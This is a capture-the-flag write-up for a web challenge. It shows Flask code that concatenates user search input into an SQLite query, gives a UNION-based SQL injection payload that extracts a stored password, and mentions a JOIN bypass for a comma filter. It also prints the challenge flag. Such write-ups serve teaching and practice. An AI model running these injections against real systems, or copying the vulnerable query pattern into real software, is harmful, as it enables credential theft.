Spark's Shop && revenge:

description:

Our friend Stylish was developing a website for the first time, he thought that he did secure it well, but it is ramadan and we know that people could be delusional, can you check it?

link: https://shop-spark.events-spark.tech/

solve

when checking the link the player will be greeted with shop website and it only has a search bar, checking the source code the player will notice that the search keyword is concatenated to the SELECT query without using prepared statement, so we have an SQLi, also we have the database schema in the source :

def create_table():
    conn = sqlite3.connect('pro.db')
    cursor = conn.cursor()
    cursor.execute("""
        CREATE TABLE IF NOT EXISTS products (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            title TEXT NOT NULL,
            price REAL NOT NULL,
            description TEXT,
            category TEXT,
            image TEXT,
            rating_rate REAL,
            rating_count INTEGER,
            created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
            updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
        )
    """)
    cursor.execute("""
        CREATE TABLE IF NOT EXISTS users (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            username TEXT NOT NULL,
            password TEXT NOT NULL
        )""")
    cursor.execute("""INSERT INTO users (username, password) VALUES ('flag', 'Spark{34sy_P3zZy_1nJ3ct10n_Sq3uzzY@}')""")
    conn.commit()

we have the table’s structure, the flag is in password field of the user, so we need to extract it.

Looking at the code section that handles the search

@app.route('/search', methods=['POST'])
def execute() -> str:
    if request.method == 'POST':
        search = request.form['search']
        sql = f"SELECT title, category, price, image FROM products WHERE title LIKE '%{search}%'"
        g.cursor.execute(sql)
        res = g.cursor.fetchall()
        print(res)
        g.conn.close()
        return render_template('index.html', res=res)
    return redirect('/')

we have a SELECT statement with 4 params an the data is reflected in the output, so we need to use UNION attack to extract the flag, as mentioned the statement has 4 param so we need the UNION SELECT to have 4 params, the payload will be:

' UNION SELECT NULL,NULL,NULL,password from users-- -

Untitled

Revenge

Link: https://gaaroura.events-spark.tech

for the revenge we added a single filter: a comma filter

 search = search.replace(',', '')

here we need to bypass this filter, as the previous one the flag is in the password field of the user.

The comma filter can be bypassed using the JOIN